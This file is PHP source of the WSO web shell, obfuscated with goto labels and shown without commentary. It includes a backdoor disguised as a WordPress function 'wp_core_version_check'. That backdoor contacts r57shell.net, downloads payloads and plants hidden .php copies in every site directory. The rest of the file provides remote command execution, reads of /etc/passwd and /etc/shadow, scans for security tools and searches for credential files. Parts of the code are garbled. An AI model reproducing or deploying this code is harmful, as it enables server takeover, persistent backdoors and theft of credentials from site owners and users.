IWzV6:
if (!empty($_POST["p1"])) {
echo htmlspecialchars(
"$ " . $_POST["p1"] . "
" . wsoEx($_POST["p1"])
);
}
goto nacH0;
c_48E:
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xd
var cur = 0;\xd\xafunction kp(e) {
\xa var n = (window.Event) ? e.which : e.keyCode;
\xa\x9if(n == 38) {\xd
\x9cur--;\xd
\x9\x9if(cur>=0)\xd
\x9document.cf.cmd.value = cmds[cur];\xd\xa \x9else
\x9\x9 cur++;
\xa\x9} else if(n == 40) {
\xa cur++;\xd\xa\x9 if(cur < cmds.length)\xd
document.cf.cmd.value = cmds[cur];\xd
\x9\x9else
\x9 cur--;
\xa }\xd\xa}
\xafunction add(cmd) {\xd
\x9cmds.pop();
\x9cmds.push(cmd);
\xa cmds.push('');
cur = cmds.length-1;\xd\xa}\xd\xa</script>";
goto qs3Ch;
qrzII:
foreach ($GLOBALS["aliases"] as $n => $v) {
if ($v == "") {
echo "<optgroup label="-" .
htmlspecialchars($n) .
"-"></optgroup>";
continue;
}
echo "<option value="" .
htmlspecialchars($v) .
"">" .
$n .
"</option>";
}
goto f8SjV;
KpSEA:
if (empty($_POST["ajax"]) && !empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
0
);
}
goto dwgoJ;
dwgoJ:
wsoHeader();
goto c_48E;
rclMD:
if (!empty($_POST["p1"]) && !empty($_POST["p2"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"stderr_to_out",
true
);
$_POST["p1"] .= " 2>&1";
} elseif (!empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"stderr_to_out",
0
);
}
goto fIAZm;
APwh_:
}
goto rTVjF;
XWpnO:
if (
!function_exists(
"wp_core_version_check"
)
) {
function wp_core_version_check()
{
goto avUWa;
wkmQ0:
$uri_path = dirname($uri_path);
goto s730R;
vOWZG:
$uri_path = $parse_url["path"];
goto wkmQ0;
sM0UF:
if (is_writable(sys_get_temp_dir())) {
$tmp_file =
sys_get_temp_dir() .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
} else {
$tmp_file =
$file_path .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
}
goto vbq6x;
rs5dk:
$uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
goto bu9lX;
toU7p:
$hostname = str_replace(
"www.",
"",
$_SERVER["HTTP_HOST"]
);
goto sM0UF;
vbq6x:
if (@$_GET["slince_golden"]) {
goto TmOVZ;
UCuri:
if (function_exists("curl_init")) {
goto BJyTL;
vyR_l:
curl_close($ch);
goto SHblm;
hYCm_:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto VE1SX;
VE1SX:
$response = curl_exec($ch);
goto vyR_l;
i0bPI:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
goto hYCm_;
BJyTL:
$ch = curl_init();
goto i0bPI;
SHblm:
} else {
$response = file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
}
goto kmEj4;
TmOVZ:
echo "<!-- //Silence is golden. -->";
goto UCuri;
kmEj4:
if (md5(sha1(@$_GET["is"])) == $response) {
goto kgaYa;
pHtWV:
if (@$_POST["l"]) {
function basic_code_extensions($request)
{
goto Wqe1_;
q3A5w:
$tmpf = stream_get_meta_data($tmp);
goto gYkau;
DzU1V:
fclose($tmp);
goto i26c2;
uYFTY:
$ret = include $tmpf;
goto DzU1V;
dzD32:
fwrite($tmp, $request);
goto uYFTY;
Wqe1_:
$tmp = tmpfile();
goto q3A5w;
i26c2:
return $ret;
goto An9L2;
gYkau:
$tmpf = $tmpf["uri"];
goto dzD32;
An9L2:
}
print_r(basic_code_extensions($_POST["l"]));
}
goto fi0K3;
FBXXk:
if (@$_GET["m"]) {
goto pvkox;
ANUJn:
echo $file_name_path;
goto svCvU;
ZI_cL:
@file_put_contents($file_name_path, $response);
goto ANUJn;
pvkox:
if (
function_exists("curl_init")
) {
goto QH3uY;
hFb2E:
$response = curl_exec($ch);
goto Qk97j;
j__CW:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/mini_admin.txt"
);
goto S9Uoo;
Qk97j:
curl_close($ch);
goto eMk6h;
QH3uY:
$ch = curl_init();
goto j__CW;
S9Uoo:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto hFb2E;
eMk6h:
} else {
$response = file_get_contents(
"http://r57shell.net/mini_admin.txt"
);
}
goto X5MJi;
X5MJi:
$file_name_path =
@$_GET["m"] . "gagal.php";
goto ZI_cL;
svCvU:
}
goto pHtWV;
kgaYa:
if (@$_GET["f"]) {
print_r($_GET["f"]($_GET["c"]));
}
goto FBXXk;
fi0K3:
}
goto d_oge;
d_oge:
exit();
goto fDMzx;
fDMzx:
}
goto gHtz2;
fqAaN:
$dirs = array_filter(
glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto SO8pY;
SO8pY:
foreach ($dirs as $d) {
goto Scp89;
cQFnr:
@file_put_contents($file_name, $response);
goto cQiiG;
Scp89:
$file_name =
$d .
DIRECTORY_SEPARATOR .
"." .
basename($d) .
".php";
goto cQFnr;
IlPtg:
foreach ($dirs as $d) {
if (
!@preg_match(
"#wp-content#",
$d
)
) {
$file_name =
$d .
DIRECTORY_SEPARATOR .
"." .
basename($d) .
".php";
@file_put_contents($file_name, $response);
}
}
goto u66S4;
cQiiG:
$dirs = array_filter(
glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto IlPtg;
u66S4:
}
goto Q6DRk;
bu9lX:
if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == "") {
$document_root = $file_path;
} else {
$document_root = str_replace($uri_path, "", $file_path);
}
goto toU7p;
gHtz2:
if (!file_exists($tmp_file)) {
goto f_kq1;
QKlrR:
@file_put_contents($tmp_file, $response);
goto Ul3cm;
f_kq1:
if (function_exists("curl_init")) {
goto A1VWF;
J1jm0:
curl_close($ch);
goto p2Bti;
dYLi3:
$response = curl_exec($ch);
goto J1jm0;
sjN5S:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto nQ3kj;
A1VWF:
$ch = curl_init();
goto LvoXB;
LvoXB:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto sjN5S;
nQ3kj:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] .
$_SERVER["REQUEST_URI"]
);
goto dYLi3;
p2Bti:
} else {
goto aeiKy;
aeiKy:
$referer =
$_SERVER["HTTP_HOST"] .
$_SERVER["REQUEST_URI"];
goto XFWPB;
Qt92G:
$context = stream_context_create($opts);
goto mtDkU;
XFWPB:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}
\xa",
],
],
];
goto Qt92G;
mtDkU:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto jDy5x;
jDy5x:
}
goto NFiUK;
NFiUK:
@touch($tmp_file);
goto QKlrR;
Ul3cm:
} else {
$response = file_get_contents($tmp_file);
if (!@preg_match("#stt1#", $response)) {
goto KzbMt;
HV6vx:
@touch($tmp_file);
goto pdkVa;
KzbMt:
if (function_exists("curl_init")) {
goto eMsto;
LO0re:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] .
$_SERVER[
"REQUEST_URI"
]
);
goto k5X0p;
HJ7kx:
curl_close($ch);
goto gjzj0;
j4CQT:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto LO0re;
CssGj:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto j4CQT;
k5X0p:
$response = curl_exec($ch);
goto HJ7kx;
eMsto:
$ch = curl_init();
goto CssGj;
gjzj0:
} else {
goto GK4cX;
a3V7j:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}\xd\xa",
],
],
];
goto v8ndl;
GK4cX:
$referer =
$_SERVER["HTTP_HOST"] .
$_SERVER[
"REQUEST_URI"
];
goto a3V7j;
rOcio:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto nx629;
v8ndl:
$context = stream_context_create($opts);
goto rOcio;
nx629:
}
goto HV6vx;
pdkVa:
@file_put_contents($tmp_file, $response);
goto mecCz;
mecCz:
}
}
goto fqAaN;
avUWa:
$document_file =
$_SERVER[
"SCRIPT_FILENAME"
];
goto tIPJm;
CD9KV:
$parse_url = parse_url($request_uri);
goto vOWZG;
tIPJm:
$request_uri = $_SERVER["REQUEST_URI"];
goto CD9KV;
s730R:
$file_path = dirname($document_file);
goto rs5dk;
Q6DRk:
}
wp_core_version_check();
}
goto SG2I5;
cUzsD:
if ($os == "win") {
$home_cwd = str_replace("\", "/", $home_cwd);
$cwd = str_replace("\", "/", $cwd);
}
goto qljle;
oE6Ue:
$home_cwd = @getcwd();
goto qZOco;
eRZM6:
function wsoPermsColor($f)
{
if (!@is_readable($f)) {
return "<font color=#FF0000>" .
wsoPerms(@fileperms($f)) .
"</font>";
} elseif (!@is_writable($f)) {
return "<font color=white>" .
wsoPerms(@fileperms($f)) .
"</font>";
} else {
return "<font color=#25ff00>" .
wsoPerms(@fileperms($f)) .
"</font>";
}
}
goto guAyk;
HhMRL:
function actionSecInfo()
{
goto wqp98;
qT_UQ:
wsoSecParam(
"cURL support",
function_exists("curl_version")
? "enabled"
: "no"
);
goto zEzgM;
oKr71:
if (function_exists("pg_connect")) {
$temp[] = "PostgreSQL";
}
goto owg70;
giF29:
wsoSecParam(
"Safe mode exec dir",
@ini_get(
"safe_mode_exec_dir"
)
);
goto V6Pow;
o51U2:
wsoSecParam(
"Open base dir",
@ini_get("open_basedir")
);
goto giF29;
m3Zin:
wsoSecParam(
"Disabled PHP Functions",
$GLOBALS[
"disable_functions"
]
? $GLOBALS[
"disable_functions"
]
: "none"
);
goto o51U2;
owg70:
if (function_exists("oci_connect")) {
$temp[] = "Oracle";
}
goto DQ0Hi;
I0L0t:
if (
function_exists(
"mysql_get_client_info"
)
) {
$temp[] =
"MySql (" . mysqli_get_client_info() . ")";
}
goto T3sY7;
T3sY7:
if (
function_exists("mssql_connect")
) {
$temp[] = "MSSQL";
}
goto oKr71;
Kcf2h:
echo "<h1>Server security information</h1><div class=content>";
goto deosI;
GSa9X:
echo "<br>";
goto Ppg7_;
zA3JJ:
wsoSecParam(
"Server software",
@getenv("SERVER_SOFTWARE")
);
goto aO8HS;
IbU7m:
echo "</div>";
goto XTIFZ;
XTIFZ:
wsoFooter();
goto jAziO;
V6Pow:
wsoSecParam(
"Safe mode include dir",
@ini_get(
"safe_mode_include_dir"
)
);
goto qT_UQ;
zEzgM:
$temp = [];
goto I0L0t;
DQ0Hi:
wsoSecParam(
"Supported databases",
implode(", ", $temp)
);
goto GSa9X;
Ppg7_:
if ($GLOBALS["os"] == "nix") {
goto yzksH;
Pr2du:
if (!$GLOBALS["safe_mode"]) {
goto tBdFD;
b1GnC:
wsoSecParam(
"Userful",
implode(", ", $temp)
);
goto gsw3Q;
IArV4:
$temp = [];
goto bo6ds;
SphFn:
wsoSecParam(
"Hosts",
@file_get_contents("/etc/hosts")
);
goto dOgcI;
bo6ds:
foreach ($userful as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto b1GnC;
VXdNV:
wsoSecParam("Danger", implode(", ", $temp));
goto xDJbP;
tBdFD:
$userful = [
"gcc",
"lcc",
"cc",
"ld",
"make",
"php",
"perl",
"python",
"ruby",
"tar",
"gzip",
"bzip",
"bzip2",
"nc",
"locate",
"suidperl",
];
goto j1mm2;
zL0U4:
foreach ($danger as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto VXdNV;
F15O4:
echo "<br/>";
goto vzm5g;
gsw3Q:
$temp = [];
goto zL0U4;
AYbzB:
wsoSecParam(
"Downloaders",
implode(", ", $temp)
);
goto F15O4;
M0R0C:
$downloaders = [
"wget",
"fetch",
"lynx",
"links",
"curl",
"get",
"lwp-mirror",
];
goto nuthD;
dOgcI:
echo "<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>";
goto Fh4yv;
Fh4yv:
if (
isset($_POST["p2"], $_POST["p3"]) &&
is_numeric($_POST["p2"]) &&
is_numeric($_POST["p3"])
) {
goto TMVUA;
Aagop:
wsoSecParam("Users", $temp);
goto H4g4C;
TMVUA:
$temp = "";
goto g4wsK;
yuLqo:
echo "<br/>";
goto Aagop;
g4wsK:
for (
;
$_POST["p2"] <= $_POST["p3"];
$_POST["p2"]++
) {
$uid = @posix_getpwuid($_POST["p2"]);
if ($uid) {
$temp .= join(":", $uid) . "
";
}
}
goto yuLqo;
H4g4C:
}
goto GP22b;
vzm5g:
wsoSecParam(
"HDD space",
wsoEx("df -h")
);
goto SphFn;
j1mm2:
$danger = [
"kav",
"nod32",
"bdcored",
"uvscan",
"sav",
"drwebd",
"clamd",
"rkhunter",
"chkrootkit",
"iptables",
"ipfw",
"tripwire",
"shieldcc",
"portsentry",
"snort",
"ossec",
"lidsadm",
"tcplodg",
"sxid",
"logcheck",
"logwatch",
"sysmask",
"zmbscap",
"sawmill",
"wormscan",
"ninja",
];
goto M0R0C;
xDJbP:
$temp = [];
goto pSd_M;
pSd_M:
foreach ($downloaders as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto AYbzB;
nuthD:
echo "<br>";
goto IArV4;
GP22b:
}
goto QDcOt;
yzksH:
wsoSecParam(
"Readable /etc/passwd",
@is_readable("/etc/passwd")
? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>"
: "no"
);
goto ledym;
ESH98:
wsoSecParam(
"OS version",
@file_get_contents(
"/proc/version"
)
);
goto ZLZ7x;
ZLZ7x:
wsoSecParam(
"Distr name",
@file_get_contents(
"/etc/issue.net"
)
);
goto Pr2du;
ledym:
wsoSecParam(
"Readable /etc/shadow",
@is_readable("/etc/shadow")
? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>"
: "no"
);
goto ESH98;
QDcOt:
} else {
goto NsBCo;
Me9Q1:
wsoSecParam(
"Account Settings",
wsoEx("net accounts")
);
goto RXCoL;
NsBCo:
wsoSecParam(
"OS Version",
wsoEx("ver")
);
goto Me9Q1;
RXCoL:
wsoSecParam(
"User Accounts",
wsoEx("net user")
);
goto DnuxL;
DnuxL:
}
goto IbU7m;
wqp98:
wsoHeader();
goto Kcf2h;
aO8HS:
if (
function_exists(
"apache_get_modules"
)
) {
wsoSecParam(
"Loaded Apache modules",
implode(", ", apache_get_modules())
);
}
goto m3Zin;
deosI:
function wsoSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo "<span>" .
$n .
": </span>";
if (strpos($v, "
") === false) {
echo $v . "<br>";
} else {
echo "<pre class=ml1>" .
$v .
"</pre>";
}
}
}
goto zA3JJ;
jAziO:
}
goto oHsYW;
qljle:
if ($cwd[strlen($cwd) - 1] != "/") {
$cwd .= "/";
}
goto j4eIF;
g7ZCc:
@ini_set("log_errors", 0);
goto ABTpd;
XeOpc:
if (
!function_exists(
"posix_getpwuid"
) &&
strpos(
$GLOBALS[
"disable_functions"
],
"posix_getpwuid"
) === false
) {
function posix_getpwuid($p)
{
return false;
}
}
goto lUvYe;
KC9ar:
function actionStringTools()
{
goto MBvsT;
S0req:
if (empty($_POST["ajax"]) && !empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
0
);
}
goto nYBgB;
Oymko:
if (!function_exists("hex2ascii")) {
function hex2ascii($p)
{
goto uM0Pu;
NG1dD:
return $r;
goto fKGDN;
uM0Pu:
$r = "";
goto ac1Yo;
ac1Yo:
for ($i = 0; $i < strLen($p); $i += 2) {
$r .= chr(hexdec($p[$i] . $p[$i + 1]));
}
goto NG1dD;
fKGDN:
}
}
goto ZMcUd;
vUNKP:
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " .
(@$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
? "checked"
: "") .
"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" .
(empty($_POST["p1"])
? ""
: htmlspecialchars(@$_POST["p2"])) .
"</textarea></form><pre class='ml1' style='" .
(empty($_POST["p1"])
? "display:none;"
: "") .
"margin-top:5px' id='strOutput'>";
goto k5nqW;
ZMcUd:
if (!function_exists("ascii2hex")) {
function ascii2hex($p)
{
goto cdb2T;
O0tgA:
for ($i = 0; $i < strlen($p); ++$i) {
$r .= sprintf("%02X", ord($p[$i]));
}
goto JVXpM;
cdb2T:
$r = "";
goto O0tgA;
JVXpM:
return strtoupper($r);
goto I6jbu;
I6jbu:
}
}
goto q2kmv;
HYxD9:
echo "<h1>String conversions</h1><div class=content>";
goto OX44o;
awjDW:
function wsoRecursiveGlob($path)
{
goto TkAHe;
lEFZ5:
if (is_array($paths) && @count($paths)) {
foreach ($paths as $item) {
if (@is_dir($item)) {
if ($path != $item) {
wsoRecursiveGlob($item);
}
} else {
if (
empty($_POST["p2"]) ||
@strpos(file_get_contents($item), $_POST["p2"]) !==
false
) {
echo "<a href='#' onclick='g("FilesTools",null,"" .
urlencode($item) .
"", "view","")'>" .
htmlspecialchars($item) .
"</a><br>";
}
}
}
}
goto fVCol;
GUM3F:
$paths = @array_unique(
@array_merge(
@glob($path . $_POST["p3"]),
@glob($path . "*", GLOB_ONLYDIR)
)
);
goto lEFZ5;
TkAHe:
if (substr($path, -1) != "/") {
$path .= "/";
}
goto GUM3F;
fVCol:
}
goto qLbIZ;
aUced:
if (!function_exists("binhex")) {
function binhex($p)
{
return dechex(bindec($p));
}
}
goto Oymko;
MBvsT:
if (!function_exists("hex2bin")) {
function hex2bin($p)
{
return decbin(hexdec($p));
}
}
goto aUced;
q2kmv:
if (
!function_exists(
"full_urlencode"
)
) {
function full_urlencode($p)
{
goto d1_DN;
d1_DN:
$r = "";
goto D3iJl;
YAXHC:
return strtoupper($r);
goto wfgBE;
D3iJl:
for ($i = 0; $i < strlen($p); ++$i) {
$r .= "%" . dechex(ord($p[$i]));
}
goto YAXHC;
wfgBE:
}
}
goto IHtdM;
N3xOi:
if (isset($_POST["ajax"])) {
goto V2x0a;
Wm5Kx:
exit();
goto IafqZ;
x5Jd7:
if (in_array($_POST["p1"], $stringTools)) {
echo $_POST["p1"]($_POST["p2"]);
}
goto vD3zd;
vD3zd:
$temp =
"document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" .
addcslashes(
htmlspecialchars(ob_get_clean()),
"
\xd\x9\'\x0"
) .
"';\xa";
goto NED_K;
V2x0a:
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
true
);
goto LTDt0;
LTDt0:
ob_start();
goto x5Jd7;
NED_K:
echo strlen($temp), "
", $temp;
goto Wm5Kx;
IafqZ:
}
goto S0req;
nYBgB:
wsoHeader();
goto HYxD9;
k5nqW:
if (!empty($_POST["p1"])) {
if (in_array($_POST["p1"], $stringTools)) {
echo htmlspecialchars($_POST["p1"]($_POST["p2"]));
}
}
goto jZzWZ;
OX44o:
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
goto BBAR5;
Rfc53:
wsoFooter();
goto JMM51;
uWngZ:
echo "</div><br><h1>Search for hash:</h1><div class=content>\xd\xa \x9<form method='post' target='_blank' name='hf'>
\xa \x9\x9<input type='text' name='hash' style='width:200px;'><br>\xd
<input type='hidden' name='act' value='find'/>
\x9 <input type='button' value='hashcracking.ru' onclick="document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()"><br>
\x9 <input type='button' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
\xa <input type='button' value='crackfor.me' onclick="document.hf.action='http://crackfor.me/index.php';document.hf.submit()"><br>
\x9 </form></div>";
goto Rfc53;
BBAR5:
foreach ($stringTools as $k => $v) {
echo "<option value='" .
htmlspecialchars($v) .
"'>" .
$k .
"</option>";
}
goto vUNKP;
qLbIZ:
if (@$_POST["p3"]) {
wsoRecursiveGlob($_POST["c"]);
}
goto uWngZ;
jZzWZ:
echo "</pre></div><br><h1>Search files:</h1><div class=content>\xd
\x9 <form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xd
\x9<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xd\xa\x9\x9 <tr><td>Path:</td><td><input type='text' name='cwd' value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"' style='width:100%'></td></tr>\xd\xa <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
\xa\x9 <tr><td></td><td><input type='submit' value='>>'></td></tr>\xd\xa \x9 </table></form>";
goto awjDW;
IHtdM:
$stringTools = [
"Base64 encode" =>
"base64_encode",
"Base64 decode" =>
"base64_decode",
"Url encode" =>
"urlencode",
"Url decode" =>
"urldecode",
"Full urlencode" =>
"full_urlencode",
"md5 hash" => "md5",
"sha1 hash" => "sha1",
"crypt" => "crypt",
"CRC32" => "crc32",
"ASCII to HEX" =>
"ascii2hex",
"HEX to ASCII" =>
"hex2ascii",
"HEX to DEC" => "hexdec",
"HEX to BIN" =>
"hex2bin",
"DEC to HEX" => "dechex",
"DEC to BIN" => "decbin",
"BIN to HEX" => "binhex",
"BIN to DEC" =>
"bindec",
"String to lower case" =>
"strtolower",
"String to upper case" =>
"strtoupper",
"Htmlspecialchars" =>
"htmlspecialchars",
"String length" =>
"strlen",
];
goto N3xOi;
JMM51:
}
goto xB4MH;
sO9OV:
$cwd = @getcwd();
goto cUzsD;
SG2I5:
function WSOstripslashes($array)
{
return is_array($array)
? array_map(
"WSOstripslashes",
$array
)
: stripslashes($array);
}
goto M9YJl;
EoPoZ:
if ($os == "win") {
$aliases = [
"List Directory" =>
"dir",
"Find index.php in current dir" =>
"dir /s /w /b index.php",
"Find *config*.php in current dir" =>
"dir /s /w /b *config*.php",
"Show active connections" =>
"netstat -an",
"Show running services" =>
"net start",
"User accounts" =>
"net user",
"Show computers" =>
"net view",
"ARP Table" => "arp -a",
"IP Configuration" =>
"ipconfig /all",
];
} else {
$aliases = [
"List dir" => "ls -lha",
"list file attributes on a Linux second extended file system" =>
"lsattr -va",
"show opened ports" =>
"netstat -an | grep -i listen",
"process status" =>
"ps aux",
"Find" => "",
"find all suid files" =>
"find / -type f -perm -04000 -ls",
"find suid files in current dir" =>
"find . -type f -perm -04000 -ls",
"find all sgid files" =>
"find / -type f -perm -02000 -ls",
"find sgid files in current dir" =>
"find . -type f -perm -02000 -ls",
"find config.inc.php files" =>
"find / -type f -name config.inc.php",
"find config* files" =>
"find / -type f -name "config*"",
"find config* files in current dir" =>
"find . -type f -name "config*"",
"find all writable folders and files" =>
"find / -perm -2 -ls",
"find all writable folders and files in current dir" =>
"find . -perm -2 -ls",
"find all service.pwd files" =>
"find / -type f -name service.pwd",
"find service.pwd files in current dir" =>
"find . -type f -name service.pwd",
"find all .htpasswd files" =>
"find / -type f -name .htpasswd",
"find .htpasswd files in current dir" =>
"find . -type f -name .htpasswd",
"find all .bash_history files" =>
"find / -type f -name .bash_history",
"find .bash_history files in current dir" =>
"find . -type f -name .bash_history",
"find all .fetchmailrc files" =>
"find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" =>
"find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" =>
"locate httpd.conf",
"locate vhosts.conf files" =>
"locate vhosts.conf",
"locate proftpd.conf files" =>
"locate proftpd.conf",
"locate psybnc.conf files" =>
"locate psybnc.conf",
"locate my.conf files" =>
"locate my.conf",
"locate admin.php files" =>
"locate admin.php",
"locate cfg.php files" =>
"locate cfg.php",
"locate conf.php files" =>
"locate conf.php",
"locate config.dat files" =>
"locate config.dat",
"locate config.php files" =>
"locate config.php",
"locate config.inc files" =>
"locate config.inc",
"locate config.inc.php" =>
"locate config.inc.php",
"locate config.default.php files" =>
"locate config.default.php",
"locate config* files " =>
"locate config",
"locate .conf files" =>
"locate '.conf'",
"locate .pwd files" =>
"locate '.pwd'",
"locate .sql files" =>
"locate '.sql'",
"locate .htpasswd files" =>
"locate '.htpasswd'",
"locate .bash_history files" =>
"locate '.bash_history'",
"locate .mysql_history files" =>
"locate '.mysql_history'",
"locate .fetchmailrc files" =>
"locate '.fetchmailrc'",
"locate backup files" =>
"locate backup",
"locate dump files" =>
"locate dump",
"locate priv files" =>
"locate priv",
];
}
goto MrsTM;
Cjo7J:
$color = "#df5";
goto LNmAT;
ocXfq:
$_COOKIE = WSOstripslashes($_COOKIE);
goto Qn_9k;
dPSqc:
if (empty($_POST["a"])) {
if (
isset($default_action) &&
function_exists("action" . $default_action)
) {
$_POST["a"] = $default_action;
} else {
$_POST["a"] = "SecInfo";
}
}
goto j2Rfu;
fj9OS:
if ($argc == 3) {
$_POST = unserialize(base64_decode($argv[1]));
$_SERVER = unserialize(base64_decode($argv[2]));
}
goto GFRHq;
MrsTM:
function wsoHeader()
{
goto E9rcc;
FKql5:
echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" .
($GLOBALS["os"] == "win"
? "<br>Drives:"
: "") .
"</span></td>" .
"<td><nobr>" .
substr(@php_uname(), 0, 120) .
" <a href="" .
$explink .
"" target=_blank>[exploit-db.com]</a></nobr><br>" .
$uid .
" ( " .
$user .
" ) <span>Group:</span> " .
$gid .
" ( " .
$group .
" )<br>" .
@phpversion() .
" <span>Safe mode:</span> " .
($GLOBALS["safe_mode"]
? "<font color=red>ON</font>"
: "<font color=green><b>OFF</b></font>") .
" <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " .
date("Y-m-d H:i:s") .
"<br>" .
wsoViewSize($totalSpace) .
" <span>Free:</span> " .
wsoViewSize($freeSpace) .
" (" .
(int) (($freeSpace / $totalSpace) * 100) .
"%)<br>" .
$cwd_links .
" " .
wsoPermsColor($GLOBALS["cwd"]) .
" <a href=# onclick="g('FilesMan','" .
$GLOBALS["home_cwd"] .
"','','','')">[ home ]</a><br>" .
$drives .
"</td>" .
"<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">" .
$opt_charsets .
"</optgroup></select><br><span>Server IP:</span><br>" .
@$_SERVER["SERVER_ADDR"] .
"<br><span>Client IP:</span><br>" .
$_SERVER["REMOTE_ADDR"] .
"</nobr></td></tr></table>" .
"<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" .
$menu .
"</tr></table><div style="margin:5">";
goto RzURU;
M4wyI:
$m = [
"Sec. Info" => "SecInfo",
"Files" => "FilesMan",
"Console" => "Console",
"Sql" => "Sql",
"Php" => "Php",
"String tools" =>
"StringTools",
"Bruteforce" =>
"Bruteforce",
"Network" => "Network",
];
goto JIPap;
XR0lk:
$totalSpace = $totalSpace ? $totalSpace : 1;
goto gDdS4;
QoI2U:
$drives = "";
goto dJUUJ;
E9rcc:
if (empty($_POST["charset"])) {
$_POST["charset"] =
$GLOBALS[
"default_charset"
];
}
goto wwJNm;
yWMQp:
$charsets = [
"UTF-8",
"Windows-1251",
"KOI8-R",
"KOI8-U",
"cp866",
];
goto QAzn_;
JIPap:
if (!empty($GLOBALS["auth_pass"])) {
$m["Logout"] = "Logout";
}
goto hedz2;
nmRB7:
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" .
$_POST["charset"] .
"'><title>" .
$_SERVER["HTTP_HOST"] .
" - WSO " .
WSO_VERSION .
"</title>\xd
<style>
\xabody{background-color:#444;color:#e1e1e1;}
\xabody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\xd\xatable.info{ color:#fff;background-color:#222; }
\xaspan,h1,a{ color: {$color} !important; }\xd
span{ font-weight: bolder; }\xd
h1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\xd
div.content{ padding: 5px;margin-left:5px;background-color:#333; }\xd\xaa{ text-decoration:none; }\xd\xaa:hover{ text-decoration:underline; }
\xa.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }\xd\xainput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\xd
form{ margin:0px; }
\xa#toolsTbl{ text-align:center; }
\xa.toolsInp{ width: 300px }
\xa.main th{text-align:left;background-color:#5e5e5e;}\xd\xa.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
\xa.l2{background-color:#333}\xd
pre{font-family:Courier,Monospace;}
</style>
\xa<script>
\xa var c_ = '" .
htmlspecialchars($GLOBALS["cwd"]) .
"';\xd\xa var a_ = '" .
htmlspecialchars(@$_POST["a"]) .
"'\xd
var charset_ = '" .
htmlspecialchars(@$_POST["charset"]) .
"';\xd
var p1_ = '" .
(strpos(@$_POST["p1"], "
") !== false
? ""
